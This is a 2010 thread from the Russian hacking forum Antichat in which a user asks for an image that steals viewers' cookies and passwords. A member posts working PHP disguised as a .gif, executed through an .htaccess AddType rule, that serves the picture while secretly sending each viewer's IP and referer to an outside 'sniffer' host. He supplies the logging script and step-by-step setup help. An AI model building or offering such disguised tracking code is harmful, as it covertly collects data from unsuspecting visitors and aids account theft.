Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.02.2010, 20:53
|
|
Новичок
Регистрация: 08.02.2010
Сообщений: 8
Провел на форуме:
9961
Репутация:
0
|
|
Картинка ворует cookie
Доброго времени суток, очень нужно реализовать подобную вещь:
Пользователь открывает страницу с изображением (допустим аватаркой) при просмотре данного изображения, оно отправляет cookies данного пользователя на определенный email
Использование сторонних скриптов на странице не прокатит, скрипт должен быть внедрен прямо в изображение
В прочем многого то мне получать и не нужно (лишь ip, страница, где находилось изображение... Хотя от паролей бы не отказался.. но это уже лишь ради шалости )) )
Мучаюсь над этим вопросом уже 2й день, в интернете абсолютно ничего на эту тему нет... =-(
Может быть существует некий сниффер, обрабатывающий избражение, которое находится на стороннем хосте, а не на самом сервере сниффера? Такое решение тоже подойдет
Слышал про Img_Sniffcookgrab.exe , но так нигде найти не смог
|
|
|
09.02.2010, 20:59
|
|
Постоянный
Регистрация: 05.06.2009
Сообщений: 706
Провел на форуме:
2764047
Репутация:
759
|
|
элементарно.
изображение - лишь часть веб-контента, с JScript можно и не такое.
пассы снимаю не так. and no word anymore.
|
|
|
|
09.02.2010, 21:04
|
|
Новичок
Регистрация: 08.02.2010
Сообщений: 8
Провел на форуме:
9961
Репутация:
0
|
|
Дело в том, что есть только изображение, сторонние скрипты в данном случае - не выход
|
|
|
|
10.02.2010, 06:28
|
|
Познающий
Регистрация: 28.04.2009
Сообщений: 61
Провел на форуме:
103259
Репутация:
37
|
|
Есть подозрение что такое невозможно. (если только на картинку ссыль)
Если есть возможность сослаться на скрипт который генерит картинку, то тогда можно 
Типа линеечек которые в подписи любят многие пихать, она генерится скриптом.
ПыСы. А ещё интересно где тут реверсинг?
ПыПыСы. Ну и кукисы разумееццо тоже, а вот ip юзера и страница откуда отрыли однако реально.
Последний раз редактировалось lis84; 10.02.2010 в 08:25..
|
|
|
|
10.02.2010, 08:50
|
|
Новичок
Регистрация: 08.02.2010
Сообщений: 8
Провел на форуме:
9961
Репутация:
0
|
|
Извиняюсь, ошибся разделом
Ну куки в принципе мне не так и нужны, мне нужно знать ip и реферрор, вроде видел подобеный код на php, но не знаю, как им воспользоваться...
|
|
|
|
10.02.2010, 09:46
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Ну вот простецкий вариант. Скрипт img.gif, генерящий картинку
PHP код:
<?php
$im = imagecreatefromgif ('image.gif');
if ($im) {
header ('Content-Type: image/gif');
imagegif ($im);
imagedestroy ($im);
$sock = fsockopen ('mysniffer.com', 80, $errno, $errstr, 30);
if ($sock) {
fwrite ($sock, "GET /sniff.php?ip=" . getenv ('REMOTE_ADDR')
. "&referer=" . getenv ('HTTP_REFERER')
. " HTTP/1.1\r\nHost: server.com\r\nConnection: close\r\n\r\n");
fclose ($sock);
}
}
?>
Файл .htaccess для него
Код:
AddType application/x-httpd-php .gif
Сам "сниффер" - sniff.php
PHP код:
<?php
$log = 'sniff.log';
if (!empty ($_GET)) {
if (file_exists ($log) && is_writeable ($log))
file_put_contents ($log, $_SERVER['QUERY_STRING']);
else
echo 'File doesn\'t exist or not writeable';
}
?>
|
|
|
|
10.02.2010, 19:49
|
|
Новичок
Регистрация: 08.02.2010
Сообщений: 8
Провел на форуме:
9961
Репутация:
0
|
|
Если можно, то пожалуйста подробнее, как это использовать?
Первый скрипт как я понял вставляется в файл .gif но где указать изображение, которое сгенерится?
Затем создается файл .htaccess Куда его девать?
sniff.php - думаю это на хост, поддерживающий пхп, или ошибаюсь?
Последний раз редактировалось akkolt; 10.02.2010 в 19:52..
|
|
|
|
10.02.2010, 19:58
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
Хех...это же элементарно. если хостинга нету. Регаешься тут ТАм тебе дадут ссылку на картинку такого вида www.сайт/userbars/img_4_4383.gif - её шлеш на почту и ждешь на сайте где регался логи. С той инфой которая тебе нужна.  |
|
|
|
10.02.2010, 20:05
|
|
Новичок
Регистрация: 08.02.2010
Сообщений: 8
Провел на форуме:
9961
Репутация:
0
|
|
Это элементарно, читайте внимательнее, в первом посте сказано, что есть лишь картинка, больше ничего...
Мне не нужно никого ломать, для этого есть более подходящие способы
Если и использовать сниффер, то только тот, что способен обработать левое изображение, т.е. не кидать ссылку пользователю (п.с. изображение будет вообще статично в сети интернет, ни кому оно передаваться не будет), а загрузить изображение на хост, и затем указать ссылку на это изображение в настройках сниффера, так, чтобы сниффер его обрабатывал. Но ни как не наоборот
|
|
|
|
11.02.2010, 10:23
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
akkolt, путь к картинке прописан в строке
PHP код:
$im = imagecreatefromgif ('image.gif');
Картинка лежит рядом с файлом. Имя файла может быть любым (.GIF). .htaccess кладется также в тот же каталог, где лежит img.gif
sniff.php - думаю это на хост, поддерживающий пхп, или ошибаюсь?
Именно так, только пути и урлы правильно в скриптах пропишите. И создайте пустой файл sniff.log рядом со сниффером с правами 0666. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
